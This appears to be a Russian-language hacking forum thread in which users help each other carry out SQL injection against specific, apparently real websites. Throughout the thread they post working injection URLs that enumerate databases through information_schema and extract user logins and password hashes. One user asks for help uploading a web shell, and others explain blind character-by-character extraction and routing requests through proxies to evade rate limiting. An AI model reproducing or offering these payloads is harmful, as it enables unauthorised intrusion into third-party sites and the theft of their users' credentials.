of69, нужно в запросе указать бд: Code: http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,4,5+from+gallery2.g2_User/*
2 of69 Code: Ктонибудь, подскажите плиз в чём проблема, и как её решить?) Смотришь database(), если запрос возвращает к примеру db1, то меняешь запрос на ...+from+db1.g2_User... Если не прокатывает, то смотришь в какой базе эта таблица лежит. ...select+table_schema+from+information_schema.columns+where+table_name=g2_User... Не забудь закодировать имя таблицы char`ои или hex'ом. Ну и соответственно полученной базе составляешь запрос. 2 Calcutta Никакого посимвольного подбора. Юзай limit. ^^ Code: http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+0,1/* Поочередно меняешь limit+0,1/*, limit+1,1/*, 2,1 и т.д. Все таблички как на ладошке.
Лол, под пароли не создается спец. таблица Ищи на форуме списки распространенных названий пользовательских таблиц. account accounts game_accounts sup_auth la2_auth и т.д.
распространенные пробовал уже, практически все те что есть на форуме. значит у меня должен будет быть запрос примерно такой: http://la2.acrossworld.ru/index.php?act=18&rlvl=7&r_rec_id=-1+union+select+1,2,concat_ws(0x3a,[название таблиц с паролями],[id аккаунта]),4,5,6,7,8+from+[таблица с аккаунтами (к примеру, accounts)]/*
Ну если дословно... Это неуспешное выполнение какой-то функции. Причина - попытка выборки из несуществующей таблицы "jos_session" в базе "db0742011".
ссылку, пожалуйста, выложи =) а там мож чем и сможем помочь. //обложился распечатками статей.. всё-таки тяжело одному сидеть разбираться -)) //может кто подсказать по моей инъекции, а то мозг разрывает уже -)) второй день пытаюсь расковырять где там пароли лежат. а если кто доработает, то на плюсики не поскуплюсь
1d37r, ну то, что не работает хакер вряд ли использует... Кода я не видел, поэтому не знаю как передаётся этот хеш скриптам, и что фильтруется... Если параметр, в котором передаётся хеш уязвим к SQL-Injection, то можно провести атаку. Настчёт исправления опять же... Ты смотрел - эта таблица, из которой идёт выборка есть?
если честно я не знаю просто знакомый попросил посмотреть я посмотрел нихера не понял... вот решил у вас поинтересоваться)))) вообщем так на первый взгляд ничего опасного нет??
Помогите залить шелл если это возможно. Вот нашел давно такие скуль иньекции Сайты расположены на одном хостинге пароль к ftp расшифровать несмог. К некоторым владельцам сайтов есть пароль, но к незнаю где его вводить??? Еще там есть форум, может кто-то сможет доработать скуль чтоб вытащить хеш админа форума.
MegaBits, форумные Code: http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,pass,login,6+from+forum.users/*
Проблема решена, с помощью наставления на путь истинный более опытными sql-injecter'ами. Всем, принявшим участие, выражаю огромную благодарность!
http://itsoft.ru/search/?search_query=1&in_cat=hek%'+union+select +version()/* version() = 4.1.14 user() = itcms_test@localhost database() = itcms_test http://itcms3.itsoft.ru/itcms/ ^^
http://www.stalker-portal.ru/polls.php?id=1' (Моя первая найденная скуля... Сразу говорю, вопросу ламерские, но для того и эта тема) НУ так вот, число столбцов 6.. Однако по Полному ФАКу в разделе статьи в пункте "2.1.2 Определение выводимых столбцов" у меня стопор... Никакие "циферки" не высвечиваются http://www.stalker-portal.ru/polls.php?id=1' UNION SELECT 1,2,3,4,5,6 --/* -Вот собственно и оно В общем наставьте меня на путь истинный... Хочется узнать, можно отсюда что выжать или нет(
http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1))>0/* http://www.stalker-portal.ru/polls.php?id=1'%20or%20ascii(substring(user(),1,1))<0/* только там некая защита.. врубается на кол-во запросов в минуту, поэтому через проксики надо брутить все ))
Хмм, а эта защита случаем не на 200 секунд блочит? Я пытался просканить но меня забанили изза 'Hammering' на 200 секунд. Такс, а где можно почитать про or ascii...? В факе этого нет... Спс буду брутить) А как перейти на второй символ? sm.. С символами разобрался, покачто не забанили... А ты сколько брутил то?) Как определить сколько символов? Точнее когда закончатся символы? А как ты сделал так что он тебе показывает голосование при 1? ТАм на 1 и на 0 ничего нет в id И еще... Пасс сгенеренный сто пороцентов... Как же я с регистром разберусь??
